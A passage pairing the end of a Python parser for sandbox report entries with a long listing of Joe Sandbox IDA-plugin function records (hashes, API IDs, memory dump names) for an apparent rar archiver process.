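        line = _clean(raw)
        m = _SOURCE_RE.match(line)
        if m:  # every "Source File:" line opens a new function entry
            cur = FunctionEntry(m["dump"], int(m["base"], 16), m["pe"] == "true")
            entries.append(cur)
        elif cur is not None and ":" in line:  # section headers carry no ':' and are skipped
            key, _, value = line.partition(":")
            key, value = key.strip(), value.strip()
            if key == "Associated":
                cur.associated.append(value)
            elif key == "Snapshot File":
                cur.snapshot = value
            else:
                cur.fields[key] = value
    return entries


def snapshot_consistent(entry: FunctionEntry) -> bool:
    """Check the IDA snapshot name against the dump the entry was taken from.

    Assumption inferred from the page: hcaresult_<pid>_<dump>_<base>_<image>.jbxd
    carries the decimal process number, the dump index and the lowercase hex base.
    """
    m = re.match(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_", entry.snapshot or "")
    if not m:
        return False
    return (int(m[1]), int(m[2])) == entry.dump_identity() and int(m[3], 16) == entry.base_address


def functions_by_api(entries: List[FunctionEntry]) -> Dict[str, List[str]]:
    """Map each non-empty API ID to the Opcode IDs of the functions that carry it."""
    index: Dict[str, List[str]] = defaultdict(list)
    for e in entries:
        if e.api_id:
            index[e.api_id].append(e.opcode_id)
    return dict(index)
```

Run over the whole report rather than the two-entry sample, functions_by_api gives the set of rar functions behind each API ID, and snapshot_consistent flags any entry whose IDA snapshot does not belong to the dump it is listed under, which is worth checking before treating the Opcode IDs as a fingerprint of one image.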
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                                                      • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                      • Instruction ID: 1ec67044753a835385304de6d7fb620fa42dc1a0aa4eb228cf1476f9d2068d9c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0115476F1CA0385F6741A24EC9637931C1EF95FA4E0846F4E96EC76D6CEACA4405301
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: wcschr$BeepMessage
• String ID: ($[%c]%ls
• API String ID: 1408639281-228076469
• Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
• Instruction ID: c3dfff93b70515a1aca20cad394653a8b77778fc4188be14df9f51406764882b
• Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
• Instruction Fuzzy Hash: 3A81C422A18A4182EAB4CF05E4402BA77E1FB88B88F5405BAEF4ED7755EF3CE541C700
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
• API String ID: 233258989-622958660
• Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
• Instruction ID: 3a8dfd42db4aba25be7ef4b05563d6fbad61a9486a60084b65a4c17a82025909
• Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
• Instruction Fuzzy Hash: CD5138F3F386548AE3648F1CE881BA93690F364F90F545B68F94AD3B44DA3DDA458B01
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: wcschr
• String ID: MCAOmcao$MCAOmcao
• API String ID: 1497570035-1725859250
• Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
• Instruction ID: f56d160d49e7eb52fa36607b510daa4d7916d14a5ada7e50f750f80fa847c6c1
• Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
• Instruction Fuzzy Hash: D8416A12D1C6C380FA309F20855157E72D1EF10BC4F5984FEEE5DCA2D6EE2DA552A321
APIs
• GetCurrentProcessId.KERNEL32 ref: 00007FF69A40359E
• swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF69A4035E6
  • Part of subcall function 00007FF69A4030C8: GetFileAttributesW.KERNELBASE(00000800,00007FF69A40305D,?,?,?,?,?,?,?,?,00007FF69A414126,?,?,?,?,00000800), ref: 00007FF69A4030F0
  • Part of subcall function 00007FF69A4030C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF69A414126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF69A403119
• swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF69A403651
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                                                                                      • String ID: %u.%03u
                                                                                                                                                                                                                                      • API String ID: 2814246642-1114938957
                                                                                                                                                                                                                                      • Opcode ID: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                      • Instruction ID: 959cf6748932b9bcc87e6c89983c546f61c59751ad7a437da7bb43d27d9fb941
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB31366161868142E7349B25E4112BA76E0FB94BB4F5017B6EE7EC7BE1DF3DE4068700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: U
• API String ID: 2456169464-4171548499
• Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
• Instruction ID: 1fa536cb75e36869b96c766464208a8d23ec853ead62a6548deef027c836fd53
• Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
• Instruction Fuzzy Hash: DA418E32B19A4186EB608F25E8443AAB7E1FB88B94F4140B1EE8DC7794DF3CD512C740
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
• String ID: csm
• API String ID: 2280078643-1018135373
• Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
• Instruction ID: 3b89547a7b736092cd53d6fc16571534fced4bbe4f413abd42267b38b4682f97
• Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
• Instruction Fuzzy Hash: 85215C7A60864182E734DB16E14026E77A1FB88FA5F0016B5DEDD83B95CF3CE886CB00
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: wcschr$swprintf
• String ID: %c:\
• API String ID: 1303626722-3142399695
• Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
• Instruction ID: c655713ed7da1bb1fd2380775ad617502a94988c326ca18482a9217cd11efa44
• Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
• Instruction Fuzzy Hash: 70118E62B1874581EE346F11950107973A0EF66F90B1895F5DFAE877E6EF3CE4618340
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
• Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
• Instruction ID: 56b714c3b29ca1a08d6d08754e4ca0973e168354e299c82fd0bfc244b6ab7574
• Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C911E632B1568186FB608F25E4143AA32E2EBC4F98F1884B9DA4D87659CF3DD4568740
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 904936192-0
                                                                                                                                                                                                                                      • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                      • Instruction ID: 0eda1bee7b88970e8a952dc9bb775b7592f4c92559ad9500a166a65744986c0f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB51DE62A19A8182EB60CF25D4503AC73A1FBD4F98F0482B1DEAEC77A5DF79D512C300
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF69A3FF6FC,00000000,?,?,?,?,00007FF69A40097D), ref: 00007FF69A4038CD
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,00007FF69A3FF6FC,00000000,?,?,?,?,00007FF69A40097D,?,?,00000000), ref: 00007FF69A40391F
                                                                                                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00007FF69A3FF6FC,00000000,?,?,?,?,00007FF69A40097D,?,?,00000000), ref: 00007FF69A40399B
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00007FF69A3FF6FC,00000000,?,?,?,?,00007FF69A40097D,?,?,00000000), ref: 00007FF69A4039A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2287278272-0
                                                                                                                                                                                                                                      • Opcode ID: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                                      • Instruction ID: aede8d82f815d2aec386b3dc276ad4a58f1c6e61c7cfbff955ceb3b66f0aaaea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D441C326A0D65142EB708B21A51177A7AE0FF95FA4F1142F1EE9D877D4DF7CE40A8B00
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 932687459-0
                                                                                                                                                                                                                                      • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                      • Instruction ID: 41931f43ad024750ca9b242af69bc469ca8df1c3b2968da8acc8decd74d6080b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0416162A0DAC285EB719A21D2503FD73D0EF90F84F1846F6DBCD86A99DF2CE9458311
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
• API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
• String ID:
• API String ID: 4141327611-0
• Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
• Instruction ID: c6dc6158072afe15b62c10a94ee19dcd37eac3cdd45fd5d47673f993301dad84
• Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
• Instruction Fuzzy Hash: 90414B22E0D78246FF759E519140379B6E1EF80F90F5481F1DA8A8BAD9DF2CE8418B42
APIs
• CreateFileW.KERNEL32(?,00007FF69A3E86CB,?,?,?,00007FF69A3EA5CB,?,?,00000000,?,?,00000040,?,?,00007FF69A3E2DF9), ref: 00007FF69A3FD09D
• CreateFileW.KERNEL32(?,00007FF69A3E86CB,?,?,?,00007FF69A3EA5CB,?,?,00000000,?,?,00000040,?,?,00007FF69A3E2DF9), ref: 00007FF69A3FD0E5
• CreateFileW.KERNEL32(?,00007FF69A3E86CB,?,?,?,00007FF69A3EA5CB,?,?,00000000,?,?,00000040,?,?,00007FF69A3E2DF9), ref: 00007FF69A3FD114
• CreateFileW.KERNEL32(?,00007FF69A3E86CB,?,?,?,00007FF69A3EA5CB,?,?,00000000,?,?,00000040,?,?,00007FF69A3E2DF9), ref: 00007FF69A3FD15C
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
• Instruction ID: 291bc9b58ea90e8ea4c22f40fc3503241ce6fc29b60f6ebd127a7ed4332fd6df
• Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
• Instruction Fuzzy Hash: 71318D32618B4586E7708F11F5547AAB7E0F789BA8F505368EAAD87BC8CF3DD0048B40
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
